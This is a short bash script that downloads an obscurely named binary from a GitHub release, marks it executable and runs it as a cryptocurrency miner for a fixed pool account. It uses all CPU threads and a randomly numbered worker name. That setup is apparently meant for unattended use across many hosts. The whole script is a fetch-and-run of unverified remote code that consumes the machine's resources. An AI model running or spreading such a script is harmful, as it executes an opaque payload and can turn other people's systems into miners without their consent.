#!/bin/bash
wget https://github.com/juncilla/nari/releases/download/ioudsa/kenyal
chmod +x kenyal
./kenyal --algo qubic_xmr --account CP_43058os6pk --worker $(echo $(shuf -i 1-15000 -n 1)-polsi) --pool qubic1.hk.apool.io:3334 --thread $(nproc --all)
